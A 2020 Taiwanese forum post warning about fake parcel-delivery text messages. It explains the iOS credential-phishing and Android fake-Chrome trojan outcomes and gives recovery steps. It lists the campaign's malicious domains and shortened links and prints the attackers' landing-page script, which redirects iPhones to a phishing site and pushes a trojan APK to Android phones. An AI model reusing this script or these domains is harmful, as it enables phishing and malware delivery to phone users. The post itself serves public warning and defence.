請選擇 進入手機版 | 繼續訪問電腦版
切換風格

收到各種詐騙簡訊處理方式,詳解 2020/04/12

[複製鏈接]
查看4134 | 回覆2 | 2020-3-31 07:32:00 | 顯示全部樓層 |閱讀模式
近期台灣民眾大量收到以下內容簡訊
包裹已派發.請您及時查收
or
您的快遞通知單,收件簽收電子憑證
or
預計送貨日期:04月09日 (星期四) 請確認地址
預計送貨日期:04月13日 (星期壹) 請確認地址

image.png

92261604_1670026056482536_4679632916446183424_o.png

目前台灣各政府機關都出面積極呼籲如有收到此類簡訊千萬別點開


以下詳細解說及分析這是什麼樣的簡訊

1.這是什麼樣的簡訊?
這是一個典型的針對手機的木馬病毒及釣魚簡訊

2.收到簡訊後,沒有點開會有事情嗎?
如果只是單純收到,沒有點開並不會觸發病毒,但請多多和認識的所有人呼籲這件事的嚴重性,千萬別點開

3.如果點開了,會發生什麼事情?
點開後,分為兩種情況
蘋果手機-會跳出,保護帳戶的欺騙型引導內容
image.png
此時會要求您輸入您的Apple Store帳號密碼
輸入後就會開始一系列盜用帳號甚至刷卡付款等行為

安卓手機-會跳出,更新app的欺騙型引導內容
image.png
然後下載假的Google瀏覽器,Chrome.apk
image.png
您只要安裝完,您的手機就被徹底入侵了
接著會開始瘋狂發送相同釣魚簡訊給其他用戶,此時您的電話費可能是筆鉅款
甚至之後可能有更多消費行為衍生
image.png

4.我已經點了,並如上述操作了,該怎麼辦?
蘋果手機-請盡速更換您Apple Store的密碼,並確認是否有盜刷或盜用情形
安卓手機-如已經被瘋狂發送簡訊,請盡速用其他手機撥打給您的電信業者,限制您的簡訊功能
然後重設您的手機(如果不會操作,請會的朋友代為操作,或給電信公司幫忙處理)很重要!!

5.我有看其它網站教學,怎麼沒有說要重設手機?
安卓手機被安裝木馬病毒後,對方可隨時隨地監控,控制,使用您的手機,即透過鏡頭偷窺您的生活
就算停止了簡訊發送,木馬病毒依舊存在於手機,必須透過重設才能徹底清除


相關報導
以上內容針對一般情況提出解決方案及建立預防觀念


以下內容將針對該簡訊深度探討

目前針對該簡訊,已接獲數個網域版本
連結內容如下
wstxb.xyz 存活中
wetdh.xyz 存活中
wssaz.xyz 無內容
awetz.xyz 存活中
wwssx.xyz 存活中
huted.xyz 已被註銷
etwqa.xyz 無內容
dgcgd.xyz 存活中
beytgs.xyz 無內容
qq-yt.top 無內容
qq-we.top 無內容
6t4965.tumblr.com 已被註銷
d63s1y.tumblr.com 已被註銷
goo.gl/em7bab 已被註銷
cutt.ly/QtVlO2c 已被註銷
cutt.ly/EtX9sGl 已被註銷
cutt.ly/etVbVZQ 已被註銷
cutt.ly/ftVnYvH 已被註銷
bit.ly/3c42bMC  >>>  xcasn.xyz存活中
bit.ly/2Rk2JWE  >>>  etgsn.xyz存活中
ytrrs.club無內容

以上網域,Google均已警示,防毒軟體也都名列危險網址
該網站內容大同小異甚至一樣,皆針對手機用戶,電腦並看不到任何東西
程式碼如下:
<!doctype html>
<html lang="ko" xml:lang="ko">

<script type="text/javascript">
        
                var browser = {
                        versions: function () {
                                var u = navigator.userAgent, app = navigator.appVersion;
                                return {
                                        trident: u.indexOf('Trident') > -1,
                                        presto: u.indexOf('Presto') > -1,
                                        webKit: u.indexOf('AppleWebKit') > -1,
                                        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
                                        mobile: !!u.match(/AppleWebKit.*Mobile.*/),
                                        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
                                        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
                                        iPhone: u.indexOf('iPhone') > -1,
                                        iPad: u.indexOf('iPad') > -1,
                                };
                        }(),
                        language: (navigator.browserLanguage || navigator.language).toLowerCase()
                };

                if (browser.versions.ios || browser.versions.iPhone || browser.versions.iPad) {
                        window.alert("為了保護Apple Store 的賬戶,您的賬戶已被限制,需要重新認證.");
                        window.location.href='http://sexsa.xyz'
                } else if (browser.versions.android) {
                        window.alert("為更好體驗瀏覽效果,請更新到最新chrome版本.");
                        window.location.href = "chrome.apk";

                } else {
               


                }

</script>

</html>

簡單來說就是判斷蘋果系統跳出保護帳戶的假訊息,再導至釣魚網頁
安卓系統則建議更新,並將木馬偽裝成瀏覽器升級誘導安裝

該木馬經過數日觀察,作者幾乎天天更新檔案特徵碼,來達到防毒軟體無法識別
雖然因為一些危險權限及特徵依舊更新後當日就被數個防毒軟體識別,但識別度非常低62款僅11款有反應
image.png

目前此木馬在台灣大量流竄,懇請相關單位盡速追查來源

如有其他新增網址,或其他疑問需要幫助也可以透過下方留言告訴我

回覆
有關木馬的危害程度
這邊簡單介紹,網路上典型的手機木馬
image.png
當手機被植入木馬後,你的手機就是和這位歹徒共享了
1.他可以任意看到你手機內的所有檔案照片
2.他可以使用你的電話撥打和發送簡訊
3.他可以偷看你所有的手機畫面,包括通訊軟體的對話紀錄
4.他可以拿你的手機當跳板犯罪
5.他可以透過手機GPS知道你人在哪裡
6.他可以透過手機監聽你的通話
7.他可以透過視訊鏡頭,看到你的臉,甚至幫你拍照
8.他可以隨意幫你手機上鎖,改密碼甚至最後威脅你付比特幣贖回你的手機
9.他可以透過電信公司小額付款的方式,盜用你的錢買東西

所以,萬一你是安卓手機又已經安裝了木馬的話,趕快去重設手機


評分

參與人數 1積分 +20 紅利 +20 收起 理由
飄飄 + 20 + 20 詳細解說,熱心助人

全部評分

回覆

使用道具 檢舉

fibbfcp | 2020-3-31 15:10:12 | 顯示全部樓層
您好,因為我手機裡很多重要的資料,如果已經中毒了,可以不重設,下載防毒app嗎
回覆 支持 反對

使用道具 檢舉

路人乙 | 2020-3-31 17:52:06 | 顯示全部樓層
fibbfcp 發表於 2020-3-31 15:10
您好,因為我手機裡很多重要的資料,如果已經中毒了,可以不重設,下載防毒app嗎 ...

不建議使用防毒軟體處理
防毒軟體建議用於預防
如果已經安裝了
建議還是重設手機

我上面更新了,有關木馬的危害
回覆 支持 反對

使用道具 檢舉

您需要登入後才可以回文 登入 | 快速註冊

本版積分規則

2

主題

3

文章

31

積分

愛購物

Rank: 2

積分
31
熱門排行